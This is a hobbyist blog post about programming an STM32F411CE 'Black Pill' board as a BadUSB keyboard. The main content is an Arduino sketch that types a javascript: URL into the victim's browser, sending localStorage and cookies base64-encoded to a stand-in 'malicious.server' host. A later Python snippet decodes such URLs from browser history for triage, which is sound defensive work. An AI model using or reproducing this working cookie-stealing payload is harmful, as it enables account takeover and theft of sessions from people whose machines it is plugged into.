Simple Cookie Stealer Using "Black Pill" (STM32F411CE)
This week, I ordered an STM32 dev board codenamed the "Black Pill" from WeAct Studio, which is a dev board for the STM32F411CE. The MCU offers 512 Kbytes of flash memory, with 128 Kbytes of SRAM. The chip also has support for USB OTG FS (can act as a host/peripheral in high speed mode). This is my first time programming an STM32 thing. Before my ST-LINK V2 arrived, I tried programming via DFU (by pressing the physical reset and BOOT0 buttons) but it didn't work. From what I read online, it was due to the unreliable HSI/HSE error which was probably caused by temperature changes (I don't really understand it, but read about it [here](http://efton.sk/STM32/gotcha/g125.html)). I can get it to work, but only 1 time out of 10. I was able to view the flash memory content using STM32CubeProgrammer.

As with my first experience getting my hands on an Arduino, my first sketch would be blink, then I would make a [BadUSB](https://en.wikipedia.org/wiki/BadUSB) out of it. For my first time, I used the Arduino IDE with STM32duino installed. STM32duino is an Arduino core for STM32 MCUs/dev boards. Programming was done via the STM32CubeProgrammer SWD (using ST-LINK V2) upload method. Basically, from what I have learned so far, STM32duino provides an Arduino-like API to the Arduino IDE for ease of development. This makes the experience seem very seamless, just as if you are programming an Arduino, just with a different implementation. I also read that STM32duino might not be suitable for all applications, as you may not be able to unleash the full capabilities of the MCU. I don't really know, but I think you can do more advanced things using the HAL directly, especially when dealing with critical things, e.g. signal processing. So far, my experience has been fun.

BadUSB is simply a custom-made USB keyboard peripheral that will type malicious keystrokes into a target computer, with bad intent of course.
I made a simple script to capture `cookies` and `localStorage` content from common browsers (it should at least work in Google Chrome-like browsers).

```
#include <Keyboard.h>

#define LED_PIN PC13   // on-board LED
#define KEY_PIN PA0    // on-board user button (active low)

void setup() {
  pinMode(LED_PIN, OUTPUT);
  pinMode(KEY_PIN, INPUT_PULLUP);
  Keyboard.begin();
}

// Blink the on-board LED n times as a status indicator.
void blinkLed(short unsigned int n) {
  while (n-- > 0) {
    digitalWrite(LED_PIN, HIGH);
    delay(100);
    digitalWrite(LED_PIN, LOW);
    delay(100);
  }
}

void runPayload() {
  delay(200);
  Keyboard.press(KEY_ESC);
  Keyboard.press(KEY_ESC);
  Keyboard.releaseAll();
  Keyboard.press(KEY_RIGHT_CTRL);
  Keyboard.print('l');
  delay(200);
  Keyboard.releaseAll();
  Keyboard.printf("javascript:%s", "window.open('https://malicious.server/capture#'+btoa(escape(JSON.stringify({a:localStorage,b:document.cookie}))))");
  delay(200);
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();
  Keyboard.end();
  blinkLed(10);
}

void loop() {
  // The payload is only typed once the physical user button is pressed.
  if (digitalRead(KEY_PIN) == LOW) {
    blinkLed(3);
    runPayload();
  }
}
```

The payload, or the malicious keystrokes, will be sent to the host or target computer if the physical user button is pressed (on the Black Pill, it is active low on pin `PA0`). Then I wondered, where is `PC0` on the Black Pill board? In the STM32F411CE datasheet, I can see a `PC0` pin, but where is it? Maybe I just don't read the datasheet thoroughly enough.

Thanks to Aldi, who gave me the idea of creating a BadUSB, thus making me order an STM32 because I saw it was cheap online. I learned about STM32, got some insight from reading datasheets (though I don't understand most of it), learned about UART/SPI/I2C/JTAG online, learned about the boot sequence of ARM Cortex, learned about the memory readout protection on STM32 chips, learned about so many things... I think this is just scratching the surface of embedded programming. So far, I am very happy and very excited to learn more! The next plan would be to program the Black Pill without the Arduino IDE, at least to make a blinky.
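From the analyst's side, here is an added example (not code from the post) that recognizes and decodes the `btoa(escape(JSON.stringify(...)))` fragment format the sketch above produces, so a URL of that shape found in a browser history export can be triaged. The sample URLs, the `malicious.server` host and the dumped values are constructed; `urllib.parse.quote` is used only to build the fixture and matches JavaScript `escape()` for ASCII input.

```python
import base64
import json
import re
from urllib.parse import quote, urlsplit

# JavaScript's legacy escape(): %uXXXX for code units above 0xFF, %XX otherwise.
_ESC_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s: str) -> str:
    """Reverse JavaScript escape(), including the %uXXXX form."""
    return _ESC_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_exfil_fragment(url: str):
    """Return the JSON object carried in a URL fragment of the shape
    btoa(escape(JSON.stringify(obj))), or None if the fragment is not that shape."""
    fragment = urlsplit(url).fragment
    if not fragment:
        return None
    try:
        # btoa() emits standard base64 over Latin-1 bytes; tolerate stripped '=' padding.
        raw = base64.b64decode(fragment + "=" * (-len(fragment) % 4), validate=True)
        return json.loads(js_unescape(raw.decode("latin-1")))
    except (ValueError, UnicodeDecodeError):
        return None


def triage(urls):
    """Flag history URLs whose fragment decodes to a cookie string or storage dump."""
    hits = []
    for url in urls:
        obj = decode_exfil_fragment(url)
        if not isinstance(obj, dict):
            continue
        looks_like_dump = any(
            (isinstance(v, str) and "=" in v) or (isinstance(v, dict) and v)
            for v in obj.values()
        )
        if looks_like_dump:
            hits.append((url, obj))
    return hits


# Constructed fixture: one benign URL and one shaped like the sketch's window.open() target.
_dump = json.dumps({"a": {"token": "abc"}, "b": "session=xyz; theme=dark"}, separators=(",", ":"))
SAMPLE_URLS = [
    "https://example.com/docs#section-2",
    "https://malicious.server/capture#"
    + base64.b64encode(quote(_dump, safe="@*_+-./").encode("latin-1")).decode("ascii"),
]
```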
See you later!

Created: 2024-04-25 13:48:43, Updated: 2024-04-25 16:35:36